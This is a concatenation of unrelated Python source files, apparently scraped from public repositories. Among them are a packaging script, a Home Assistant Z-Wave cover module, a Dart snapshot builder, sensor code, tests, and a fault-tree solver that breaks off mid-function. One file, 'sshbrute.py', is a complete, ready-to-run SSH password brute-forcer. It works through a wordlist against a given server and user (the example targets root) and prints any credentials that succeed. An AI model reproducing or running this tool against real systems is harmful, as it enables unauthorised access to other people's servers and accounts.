shortcut.IconLocation = icon
shortcut.save()
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.expandvars(os.path.normpath(get_reg('Desktop',regPath)))
startmenuFolder = os.path.expandvars(os.path.normpath(get_reg('Start Menu',regPath)))
startmenuFolder = os.path.join(startmenuFolder, 'Programs', 'Lcopt')
icon = os.path.join(root_dir, 'lcopt', 'assets', 'lcopt_icon.ico')
#target = "lcopt-launcher"
#create_shortcut(desktopFolder, target, icon)
create_shortcut(startmenuFolder, "lcopt-launcher", icon)
create_shortcut(startmenuFolder, "lcopt-settings", icon)
return 0
setup(
name='lcopt-dev',
version="0.4.3_dev",
packages=packages,
author="P. James Joyce",
author_email="pjamesjoyce@gmail.com",
license=open('LICENSE.txt').read(),
package_data={'lcopt': my_package_files},
entry_points = {
'console_scripts': [
'lcopt-launcher = lcopt.bin.lcopt_launcher:main',
'lcopt-bw2-setup = lcopt.bin.lcopt_bw2_setup:main',
'lcopt-bw2-setup-forwast = lcopt.bin.lcopt_bw2_setup_forwast:main',
'lcopt-settings = lcopt.bin.lcopt_settings:main',
]
},
#install_requires=[
#],
include_package_data=True,
url="https://github.com/pjamesjoyce/lcopt/",
download_url="https://github.com/pjamesjoyce/lcopt/archive/0.4.3.tar.gz",
long_description=open('README.md').read(),
description='An interactive tool for creating fully parameterised Life Cycle Assessment (LCA) foreground models',
keywords=['LCA', 'Life Cycle Assessment', 'Foreground system', 'Background system', 'Foreground model', 'Fully parameterised'],
classifiers=[
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Visualization',
],
)
if sys.platform == 'win32':
shortcuts = create_win_shortcuts()
if shortcuts != 0:
print("Couldn't create shortcuts")
# Also consider:
# http://code.activestate.com/recipes/577025-loggingwebmonitor-a-central-logging-server-and-mon/
| pjamesjoyce/lcopt | setup.py | Python | bsd-3-clause | 4,911 |
import datetime
from ...place import Place
from ...spec import Spec
from .planet import Planet
from .dwarfplanet import DwarfPlanet
class System(Place):
"""Systems exist within galaxies, and can contain planets...
Attributes
allowedChildEntities Entity spec types that can be created from this context
spec Spec type of this Entity"""
# Things that child class SHOULDNT need to redeclare
# Things that a few child classes will need to redeclare
allowedChildEntities = [Spec.PLANET, Spec.DWARFPLANET]
# Things every child class will want to redeclare
spec = Spec.SYSTEM
# ---- Methods ---- #
def initEntityFromSpec(self, spec, key, path):
"""Attempt to initialize a specific entity using the spec type.
Will likely redefine in Places.
Arguments
spec Spec type for new entity
key Key for new entity
path Path for new entity
Return
Entity"""
if (spec == spec.PLANET):
planet = Planet(key, path)
return planet
if (spec == spec.DWARFPLANET):
dwarfPlanet = DwarfPlanet(key, path)
return dwarfPlanet
raise ContextEntityConflictError("No matching child-entity for '" + self.getSpecString() + " with spec " + spec.name)
| Jerad-M/ubfs | classes/custom/place/system.py | Python | apache-2.0 | 1,201 |
#!/usr/bin/python
#SSH BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, time
try:
import pexpect, pxssh
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
def brute(word):
print "Trying:",word
try:
s = pxssh.pxssh()
s.login (ip, user, word, login_timeout=10)
s.sendline (command)
s.prompt()
print "\n",s.before
s.logout()
print "\t[!] Login Success:",user, word,"\n"
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Quit\n"
sys.exit(1)
print "\n\t d3hydr8:darkc0de.com sshBrute v1.0"
print "\t----------------------------------------"
if len(sys.argv) != 4:
print "\nUsage : ./sshbrute.py <server> <user> <wordlist>"
print "Eg: ./sshbrute.py 198.162.1.1 root words.txt\n"
sys.exit(1)
ip = sys.argv[1]
user = sys.argv[2]
command = 'uname -a'
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",ip
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(word.replace("\n",""))
| knightmare2600/d4rkc0de | bruteforce/sshbrute.py | Python | gpl-2.0 | 1,327 |
import os
from weasyprint import HTML
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def process_IN_CREATE(self, event):
if event.pathname.endswith(".html"):
print "Creating:", event.pathname
print "Loading file"
wprint = HTML(filename=event.pathname)
print "writing thumbnail"
wprint.write_png(event.pathname.replace(".html", "_thumbnail.png")+".partial", resolution=10)
print "writing pdf"
wprint.write_pdf(event.pathname.replace(".html", ".pdf")+".partial")
print "writing png"
wprint.write_png(event.pathname.replace(".html", ".png")+".partial", resolution=300)
# Remove the ".partial" to indicate that it's done generating both.
for suffix in ('.pdf', '.png', '_thumbnail.png'):
dest = event.pathname.replace(".html", suffix)
src = dest + ".partial"
os.rename(src, dest)
def main():
wm = pyinotify.WatchManager()
mask = pyinotify.IN_CREATE
handler = EventHandler()
notifier = pyinotify.Notifier(wm, handler)
wdd = wm.add_watch('./generated', mask, rec=True)
notifier.loop()
if __name__ == "__main__":
main()
| cnelsonsic/Certificator | certificator/renderer.py | Python | agpl-3.0 | 1,252 |
"""
Support for Zwave cover components.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.zwave/
"""
# Because we do not compile openzwave on CI
# pylint: disable=import-error
import logging
from homeassistant.components.cover import (
DOMAIN, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.components.zwave import ZWaveDeviceEntity
from homeassistant.components import zwave
from homeassistant.components.zwave import async_setup_platform # noqa # pylint: disable=unused-import
from homeassistant.components.zwave import workaround
from homeassistant.components.cover import CoverDevice
_LOGGER = logging.getLogger(__name__)
SUPPORT_GARAGE = SUPPORT_OPEN | SUPPORT_CLOSE
def get_device(value, **kwargs):
"""Create zwave entity device."""
if (value.command_class == zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL
and value.index == 0):
return ZwaveRollershutter(value)
elif (value.command_class == zwave.const.COMMAND_CLASS_SWITCH_BINARY or
value.command_class == zwave.const.COMMAND_CLASS_BARRIER_OPERATOR):
return ZwaveGarageDoor(value)
return None
class ZwaveRollershutter(zwave.ZWaveDeviceEntity, CoverDevice):
"""Representation of an Zwave roller shutter."""
def __init__(self, value):
"""Initialize the zwave rollershutter."""
ZWaveDeviceEntity.__init__(self, value, DOMAIN)
# pylint: disable=no-member
self._node = value.node
self._open_id = None
self._close_id = None
self._current_position_id = None
self._current_position = None
self._workaround = workaround.get_device_mapping(value)
if self._workaround:
_LOGGER.debug("Using workaround %s", self._workaround)
self.update_properties()
@property
def dependent_value_ids(self):
"""List of value IDs a device depends on."""
if not self._node.is_ready:
return None
return [self._current_position_id]
def update_properties(self):
"""Callback on data changes for node values."""
# Position value
if not self._node.is_ready:
if self._current_position_id is None:
self._current_position_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Level'], member='value_id')
if self._open_id is None:
self._open_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Open', 'Up'], member='value_id')
if self._close_id is None:
self._close_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Close', 'Down'], member='value_id')
if self._open_id and self._close_id and \
self._workaround == workaround.WORKAROUND_REVERSE_OPEN_CLOSE:
self._open_id, self._close_id = self._close_id, self._open_id
self._workaround = None
self._current_position = self._node.get_dimmer_level(
self._current_position_id)
@property
def is_closed(self):
"""Return if the cover is closed."""
if self.current_cover_position is None:
return None
if self.current_cover_position > 0:
return False
else:
return True
@property
def current_cover_position(self):
"""Return the current position of Zwave roller shutter."""
if self._workaround == workaround.WORKAROUND_NO_POSITION:
return None
if self._current_position is not None:
if self._current_position <= 5:
return 0
elif self._current_position >= 95:
return 100
else:
return self._current_position
def open_cover(self, **kwargs):
"""Move the roller shutter up."""
zwave.NETWORK.manager.pressButton(self._open_id)
def close_cover(self, **kwargs):
"""Move the roller shutter down."""
zwave.NETWORK.manager.pressButton(self._close_id)
def set_cover_position(self, position, **kwargs):
"""Move the roller shutter to a specific position."""
self._node.set_dimmer(self._value.value_id, position)
def stop_cover(self, **kwargs):
"""Stop the roller shutter."""
zwave.NETWORK.manager.releaseButton(self._open_id)
class ZwaveGarageDoor(zwave.ZWaveDeviceEntity, CoverDevice):
"""Representation of an Zwave garage door device."""
def __init__(self, value):
"""Initialize the zwave garage door."""
ZWaveDeviceEntity.__init__(self, value, DOMAIN)
self.update_properties()
def update_properties(self):
"""Callback on data changes for node values."""
self._state = self._value.data
@property
def is_closed(self):
"""Return the current position of Zwave garage door."""
return not self._state
def close_cover(self):
"""Close the garage door."""
self._value.data = False
def open_cover(self):
"""Open the garage door."""
self._value.data = True
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_GARAGE
| morphis/home-assistant | homeassistant/components/cover/zwave.py | Python | apache-2.0 | 5,545 |
import unittest
import random
from stanford_algoritms_part1.build_blocks import partioners
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.seq = range(10)
def test_shuffle(self):
# make sure the shuffled sequence does not lose any elements
random.shuffle(self.seq)
self.seq.sort()
self.assertEqual(self.seq, range(10))
def test_part(self):
in_array = [3, 8, 2, 5, 1, 4, 7, 6]
partitioner = partioners.Partitioner()
partitioner.partition(in_array)
self.assertEqual(3, in_array[2])
self.assertTrue(min(in_array[3:]) > 3) | zaqwes8811/my-courses | my-cs/intern/java_details/java_sort_selection_details/partioners_test.py | Python | apache-2.0 | 637 |
from django.db import models
from django.utils.crypto import get_random_string
# Create your models here.
class NagMessage(models.Model):
nag_id = models.CharField(max_length=32)
message = models.TextField(null=True)
enable = models.BooleanField(default=False)
@staticmethod
def get():
if NagMessage.objects.count() == 0:
nag = NagMessage(
nag_id=get_random_string(32),
message=''
)
nag.save()
else:
nag = NagMessage.objects.first()
return nag
@staticmethod
def update(message, enable):
nag = NagMessage.get()
nag.nag_id = get_random_string(32)
nag.message = message
nag.enable = enable if message else False
nag.save()
| Maronato/SpottedBot | main/models.py | Python | agpl-3.0 | 797 |
import requests
from .Backup import Backup
from .BackupContainer import BackupContainer
from .Bridge import Bridge
from .BridgeCreate import BridgeCreate
from .BridgeCreateSetting import BridgeCreateSetting
from .CPUInfo import CPUInfo
from .CPUStats import CPUStats
from .CloudInit import CloudInit
from .Cluster import Cluster
from .ClusterCreate import ClusterCreate
from .Container import Container
from .ContainerListItem import ContainerListItem
from .ContainerNIC import ContainerNIC
from .ContainerNICconfig import ContainerNICconfig
from .ContainerUpdate import ContainerUpdate
from .CoreStateResult import CoreStateResult
from .CoreSystem import CoreSystem
from .CreateContainer import CreateContainer
from .CreateSnapshotReqBody import CreateSnapshotReqBody
from .DHCP import DHCP
from .Dashboard import Dashboard
from .DashboardListItem import DashboardListItem
from .DeleteFile import DeleteFile
from .DiskInfo import DiskInfo
from .DiskPartition import DiskPartition
from .EnumBridgeCreateNetworkMode import EnumBridgeCreateNetworkMode
from .EnumBridgeStatus import EnumBridgeStatus
from .EnumClusterCreateClusterType import EnumClusterCreateClusterType
from .EnumClusterCreateDriveType import EnumClusterCreateDriveType
from .EnumClusterCreateMetaDriveType import EnumClusterCreateMetaDriveType
from .EnumClusterDriveType import EnumClusterDriveType
from .EnumClusterStatus import EnumClusterStatus
from .EnumContainerListItemStatus import EnumContainerListItemStatus
from .EnumContainerNICStatus import EnumContainerNICStatus
from .EnumContainerNICType import EnumContainerNICType
from .EnumContainerStatus import EnumContainerStatus
from .EnumDiskInfoType import EnumDiskInfoType
from .EnumGWNICType import EnumGWNICType
from .EnumGetGWStatus import EnumGetGWStatus
from .EnumJobResultName import EnumJobResultName
from .EnumJobResultState import EnumJobResultState
from .EnumNicLinkType import EnumNicLinkType
from .EnumNodeStatus import EnumNodeStatus
from .EnumStoragePoolCreateDataProfile import EnumStoragePoolCreateDataProfile
from .EnumStoragePoolCreateMetadataProfile import EnumStoragePoolCreateMetadataProfile
from .EnumStoragePoolDataProfile import EnumStoragePoolDataProfile
from .EnumStoragePoolDeviceStatus import EnumStoragePoolDeviceStatus
from .EnumStoragePoolListItemStatus import EnumStoragePoolListItemStatus
from .EnumStoragePoolMetadataProfile import EnumStoragePoolMetadataProfile
from .EnumStoragePoolStatus import EnumStoragePoolStatus
from .EnumStorageServerStatus import EnumStorageServerStatus
from .EnumVMListItemStatus import EnumVMListItemStatus
from .EnumVMStatus import EnumVMStatus
from .EnumVdiskCreateType import EnumVdiskCreateType
from .EnumVdiskListItemStatus import EnumVdiskListItemStatus
from .EnumVdiskListItemType import EnumVdiskListItemType
from .EnumVdiskStatus import EnumVdiskStatus
from .EnumVdiskType import EnumVdiskType
from .EnumZerotierListItemType import EnumZerotierListItemType
from .EnumZerotierType import EnumZerotierType
from .EventType import EventType
from .ExportVM import ExportVM
from .FTPUrl import FTPUrl
from .Filesystem import Filesystem
from .FilesystemCreate import FilesystemCreate
from .GW import GW
from .GWCreate import GWCreate
from .GWHost import GWHost
from .GWNIC import GWNIC
from .GWNICconfig import GWNICconfig
from .GetGW import GetGW
from .Graph import Graph
from .GraphUpdate import GraphUpdate
from .HTTPProxy import HTTPProxy
from .HTTPType import HTTPType
from .HealthCheck import HealthCheck
from .IPProtocol import IPProtocol
from .Image import Image
from .ImageImport import ImageImport
from .ImportVM import ImportVM
from .Job import Job
from .JobListItem import JobListItem
from .JobResult import JobResult
from .ListGW import ListGW
from .MemInfo import MemInfo
from .Message import Message
from .MigrateGW import MigrateGW
from .NicInfo import NicInfo
from .NicLink import NicLink
from .Node import Node
from .NodeHealthCheck import NodeHealthCheck
from .NodeMount import NodeMount
from .NodeReboot import NodeReboot
from .OSInfo import OSInfo
from .PortForward import PortForward
from .Process import Process
from .ProcessSignal import ProcessSignal
from .Snapshot import Snapshot
from .StorageClusterHealthCheck import StorageClusterHealthCheck
from .StoragePool import StoragePool
from .StoragePoolCreate import StoragePoolCreate
from .StoragePoolDevice import StoragePoolDevice
from .StoragePoolListItem import StoragePoolListItem
from .StorageServer import StorageServer
from .VDiskLink import VDiskLink
from .VM import VM
from .VMCreate import VMCreate
from .VMDiskInfo import VMDiskInfo
from .VMInfo import VMInfo
from .VMListItem import VMListItem
from .VMMigrate import VMMigrate
from .VMNicInfo import VMNicInfo
from .VMUpdate import VMUpdate
from .Vdisk import Vdisk
from .VdiskCreate import VdiskCreate
from .VdiskListItem import VdiskListItem
from .VdiskResize import VdiskResize
from .VdiskRollback import VdiskRollback
from .VdiskStorage import VdiskStorage
from .Webhook import Webhook
from .WebhookUpdate import WebhookUpdate
from .WriteFile import WriteFile
from .Zerotier import Zerotier
from .ZerotierBridge import ZerotierBridge
from .ZerotierJoin import ZerotierJoin
from .ZerotierListItem import ZerotierListItem
from .ZerotierRoute import ZerotierRoute
from .client import Client as APIClient
from .oauth2_client_itsyouonline import Oauth2ClientItsyouonline
class Client:
def __init__(self, base_uri=""):
self.api = APIClient(base_uri)
self.oauth2_client_itsyouonline = Oauth2ClientItsyouonline() | zero-os/0-orchestrator | pyclient/zeroos/orchestrator/client/__init__.py | Python | apache-2.0 | 5,568 |
#!/usr/bin/env python3
#
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Script to create snapshot bin file."""
import getopt
import optparse
import os
from os.path import basename, join
import sys
import utils
def BuildOptions():
result = optparse.OptionParser()
result.add_option(
"--executable",
action="store",
type="string",
help="path to snapshot generator executable")
result.add_option(
"--snapshot_kind",
action="store",
type="string",
help="kind of snapshot to generate",
default="core")
result.add_option(
"--vm_flag",
action="append",
type="string",
default=[],
help="pass additional Dart VM flag")
result.add_option(
"--vm_output_bin",
action="store",
type="string",
help="output file name into which vm isolate snapshot in binary form " +
"is generated")
result.add_option(
"--vm_instructions_output_bin",
action="store",
type="string",
help="output file name into which vm isolate snapshot in binary form " +
"is generated")
result.add_option(
"--isolate_output_bin",
action="store",
type="string",
help="output file name into which isolate snapshot in binary form " +
"is generated")
result.add_option(
"--isolate_instructions_output_bin",
action="store",
type="string",
help="output file name into which isolate snapshot in binary form " +
"is generated")
result.add_option(
"--script",
action="store",
type="string",
help="Dart script for which snapshot is to be generated")
result.add_option(
"--packages",
action="store",
type="string",
help="package config file used to reasolve package: imports.")
result.add_option(
"-v",
"--verbose",
help='Verbose output.',
default=False,
action="store_true")
result.add_option(
"--timestamp_file",
action="store",
type="string",
help="Path to timestamp file that will be written",
default="")
return result
def ProcessOptions(options):
if not options.executable:
sys.stderr.write('--executable not specified\n')
return False
if not options.snapshot_kind:
sys.stderr.write('--snapshot_kind not specified\n')
return False
if not options.vm_output_bin:
sys.stderr.write('--vm_output_bin not specified\n')
return False
if not options.isolate_output_bin:
sys.stderr.write('--isolate_output_bin not specified\n')
return False
if (options.snapshot_kind == 'core-jit' and
not options.vm_instructions_output_bin):
sys.stderr.write('--vm_instructions_output_bin not specified\n')
return False
if (options.snapshot_kind == 'core-jit' and
not options.isolate_instructions_output_bin):
sys.stderr.write('--isolate_instructions_output_bin not specified\n')
return False
return True
def CreateTimestampFile(options):
if options.timestamp_file != '':
dir_name = os.path.dirname(options.timestamp_file)
if not os.path.exists(dir_name):
os.mkdir(dir_name)
open(options.timestamp_file, 'w').close()
def Main():
# Parse options.
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
# If there are additional arguments, report error and exit.
if args:
parser.print_help()
return 1
# Setup arguments to the snapshot generator binary.
script_args = ["--ignore_unrecognized_flags"]
for flag in options.vm_flag:
script_args.append(flag)
# Pass along the packages if there is one.
if options.packages:
script_args.append(''.join(["--packages=", options.packages]))
# First setup the vm isolate and regular isolate snapshot output filename.
script_args.append(''.join(["--snapshot_kind=", options.snapshot_kind]))
script_args.append(''.join(["--vm_snapshot_data=", options.vm_output_bin]))
script_args.append(''.join(
["--isolate_snapshot_data=", options.isolate_output_bin]))
if options.vm_instructions_output_bin != None:
script_args.append(''.join(
["--vm_snapshot_instructions=",
options.vm_instructions_output_bin]))
if options.isolate_instructions_output_bin != None:
script_args.append(''.join([
"--isolate_snapshot_instructions=",
options.isolate_instructions_output_bin
]))
# Finally append the script name if one is specified.
if options.script:
script_args.append(options.script)
# Construct command line to execute the snapshot generator binary and invoke.
command = [options.executable] + script_args
try:
utils.RunCommand(
command,
outStream=sys.stderr,
errStream=sys.stderr,
verbose=options.verbose,
printErrorInfo=True)
except Exception as e:
return -1
# Success, update timestamp file.
CreateTimestampFile(options)
return 0
if __name__ == '__main__':
sys.exit(Main())
| dart-lang/sdk | runtime/tools/create_snapshot_bin.py | Python | bsd-3-clause | 5,553 |
# ADXL345 Python Check Vibration
#
# author: Ben Jung
# license: BSD
from adxl345 import ADXL345
from math import sqrt
import time
import requests
URL = 'http://admin.kaist.ac.kr:3535/get_data?'
ID = '1'
ON_OFF_STANDARD = 0.12
SLEEP_DELAY = 0.1
ACCUMULATED_NUMBER = 10
ACCUMULATED_STANDARD = 10
# Use BLE Beacon
BLE_USED = False
# Fixed hex
BLE_HEX_FIXED_FORWARD = 'sudo hcitool -i hci0 cmd 0x08 0x0008 1E 02 01 1A 1A FF 4C 00 02 15 E2 0A 39 F4 73 F5 4B C4 A1 2F 17 D1 AD 07 A9 61 '
# Major (Machine id)
BLE_HEX_MACHINE_ID = '00 0' + ID + ' '
# Minor (State 0: idle, 1: running)
BLE_HEX_STATE_IDLE = '00 00 '
BLE_HEX_STATE_RUN = '00 01 '
BLE_HEX_FIXED_BACK = 'C8 00 '
if BLE_USED:
from subprocess import call, Popen
def check_onoff(adxl345):
std = 0
x, y, z = 0, 0, 0
for i in range(ACCUMULATED_NUMBER):
axes = adxl345.getAxes(True)
x_before, y_before, z_before = x, y, z
x, y, z = axes['x'], axes['y'], axes['z']
if i != 0:
std += sqrt((x-x_before)**2 + (y-y_before)**2 + (z-z_before)**2)
time.sleep(SLEEP_DELAY)
if std > ON_OFF_STANDARD:
print "- ON " + str(std)
return True
else:
print "- OFF " + str(std)
return False
def send_state(state):
if state:
print "* Send running_state"
r = requests.get(URL+'id='+ID+'&state=run')
else:
print "* Send idle_state"
r = requests.get(URL+'id='+ID+'&state=idle')
def change_beacon_state(state):
if state:
print "* Beacon_state running"
msg = BLE_HEX_FIXED_FORWARD + BLE_HEX_MACHINE_ID + BLE_HEX_STATE_RUN + BLE_HEX_FIXED_BACK
call(msg, shell=True)
else:
print "* Beacon_state idle"
msg = BLE_HEX_FIXED_FORWARD + BLE_HEX_MACHINE_ID + BLE_HEX_STATE_IDLE + BLE_HEX_FIXED_BACK
call(msg, shell=True)
if __name__ == "__main__":
adxl345 = ADXL345()
is_running = False
count = 0
send_state(is_running)
if BLE_USED:
Popen(['./scripts/init.sh'], shell=True)
change_beacon_state(is_running)
while True:
if check_onoff(adxl345):
if count < ACCUMULATED_STANDARD*2:
count += 1
if not is_running and count > ACCUMULATED_STANDARD:
is_running = True
send_state(is_running)
if BLE_USED:
change_beacon_state(is_running)
else:
if count > 0:
count -= 1
if is_running and count < ACCUMULATED_STANDARD+1:
is_running = False
send_state(is_running)
if BLE_USED:
change_beacon_state(is_running)
| ben-jung/iow-rpi | sensor.py | Python | bsd-2-clause | 2,702 |
#!/usr/bin/python
# Copyright 2002 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Tests that 'make' accepts target from other directories and that
# build request for those targets can be overriden.
from BoostBuild import Tester, List
t = Tester()
t.set_tree("test1")
t.run_build_system("-sTOOLSET=yfc")
t.expect_addition("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj")
t.expect_addition("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/optimization-space/b.obj")
t.expect_addition("bin/a/yfc/debug/runtime-link-dynamic/a")
t.expect_nothing_more()
t.fail(t.read("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj") !=\
"""
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
a.cpp
""")
t.fail(t.read("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/b.obj") !=\
"""
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
b.cpp
""")
t.fail(t.read("bin/a/yfc/debug/runtime-link-dynamic/a") !=\
"""
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
a.cpp
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
b.cpp
""")
# Check that we have vanilla target names available in subdirs
t.touch("auxillary/b.cpp")
t.run_build_system("-sTOOLSET b.obj", subdir="auxillary")
t.expect_touch("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/optimization-space/b.obj")
t.expect_no_modification("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj")
t.expect_no_modification("bin/a/yfc/debug/runtime-link-dynamic/a")
# Check that we cannot request link-incompatible property for source target
t.write('Jamfile', t.read('Jamfile2'))
stdout="""Error: subvariant of target ./a with properties
<optimization>off <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
requests link-incompatible property
<rtti>off
for source @auxillary/b.obj
"""
t.run_build_system("-sTOOLSET=yfc", stdout=stdout)
# Check that if we request link-compatible property then requirement for
# the source target will override it, with warning. This is similar to
# the way build requests are satisfied (see the first test)
# CONSIDER: should be print the main target which requests this one
# (and modifies requiremenets)?
t.write('Jamfile3', t.read('Jamfile3'))
t.write('auxillary/Jamfile3', t.read('auxillary/Jamfile3'))
stdout="""Warning: cannot exactly satisfy request for auxillary/b.obj with properties
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
Using
<optimization>speed <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
instead.
"""
t.run_build_system("-sTOOLSET=yfc", stdout=stdout)
# Check for link-incompatible properties
t.write('Jamfile4', t.read('Jamfile4'))
t.write('auxillary/Jamfile4', t.read('auxillary/Jamfile4'))
stdout="""Warning: cannot satisfy request for auxillary/b.obj with properties
<optimization>space <rtti>on <runtime-link>dynamic <toolset>yfc <variant>debug
Nothing will be built.
""")
t.pass_test()
| gorkinovich/DefendersOfMankind | dependencies/luabind/boost-build/test/m1-02.py | Python | gpl-3.0 | 3,178 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy
from heat.db.sqlalchemy import types as heat_db_types
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
stack = sqlalchemy.Table('stack', meta, autoload=True)
tags = sqlalchemy.Column('tags', heat_db_types.Json)
tags.create(stack)
| dragorosson/heat | heat/db/sqlalchemy/migrate_repo/versions/050_stack_tags.py | Python | apache-2.0 | 871 |
# (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
This system test module is useful to identify if some of the key components required for Iris are available.
The system tests can be run with ``python setup.py test --system-tests``.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# import iris tests first so that some things can be initialised before importing anything else
import cf_units
import numpy as np
import iris
import iris.fileformats.netcdf as netcdf
import iris.fileformats.pp as pp
import iris.tests as tests
class SystemInitialTest(tests.IrisTest):
def system_test_supported_filetypes(self):
nx, ny = 60, 60
data = np.arange(nx * ny, dtype='>f4').reshape(nx, ny)
laty = np.linspace(0, 59, ny).astype('f8')
lonx = np.linspace(30, 89, nx).astype('f8')
horiz_cs = lambda : iris.coord_systems.GeogCS(6371229)
cm = iris.cube.Cube(data, 'wind_speed', units='m s-1')
cm.add_dim_coord(
iris.coords.DimCoord(laty, 'latitude', units='degrees',
coord_system=horiz_cs()),
0)
cm.add_dim_coord(
iris.coords.DimCoord(lonx, 'longitude', units='degrees',
coord_system=horiz_cs()),
1)
cm.add_aux_coord(iris.coords.AuxCoord(np.array([9], 'i8'),
'forecast_period', units='hours'))
hours_since_epoch = cf_units.Unit('hours since epoch',
cf_units.CALENDAR_GREGORIAN)
cm.add_aux_coord(iris.coords.AuxCoord(np.array([3], 'i8'),
'time', units=hours_since_epoch))
cm.add_aux_coord(iris.coords.AuxCoord(np.array([99], 'i8'),
long_name='pressure', units='Pa'))
filetypes = ('.nc', '.pp')
if tests.GRIB_AVAILABLE:
filetypes += ('.grib2',)
for filetype in filetypes:
saved_tmpfile = iris.util.create_temp_filename(suffix=filetype)
iris.save(cm, saved_tmpfile)
new_cube = iris.load_cube(saved_tmpfile)
self.assertCML(new_cube,
('system',
'supported_filetype_%s.cml' % filetype))
@tests.skip_grib
def system_test_grib_patch(self):
import gribapi
gm = gribapi.grib_new_from_samples("GRIB2")
result = gribapi.grib_get_double(gm, "missingValue")
new_missing_value = 123456.0
gribapi.grib_set_double(gm, "missingValue", new_missing_value)
new_result = gribapi.grib_get_double(gm, "missingValue")
self.assertEqual(new_result, new_missing_value)
def system_test_imports_general(self):
if tests.MPL_AVAILABLE:
import matplotlib
import netCDF4
if __name__ == '__main__':
tests.main()
| QuLogic/iris | lib/iris/tests/system_test.py | Python | gpl-3.0 | 3,658 |
#################################################################################
# This file is the ftsolver module, which solves fault trees.
# It was developed by Paul S. Boneham. Copyright (C) 2015 Paul S. Boneham
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##################################################################################
import networkx
import matplotlib.pyplot as plt
import itertools
import ft_import
def minimalise(ft):
cs_tops = ft.successors("SOLUTION_TOP")
combs = itertools.product(cs_tops, cs_tops)
for comb in combs:
if comb[0] == comb[1]:
continue
cs_entries0 = ft.successors(comb[0])
cs_entries1 = ft.successors(comb[1])
if len(cs_entries0) < len(cs_entries1):
remove = 1
for entry in cs_entries0:
if entry not in cs_entries1:
remove = -1
break
else:
remove = 0
for entry in cs_entries1:
if entry not in cs_entries0:
remove = -1
break
if remove == 0:
try:
ft.remove_edge("SOLUTION_TOP",comb[0])
except:
pass
if remove == 1:
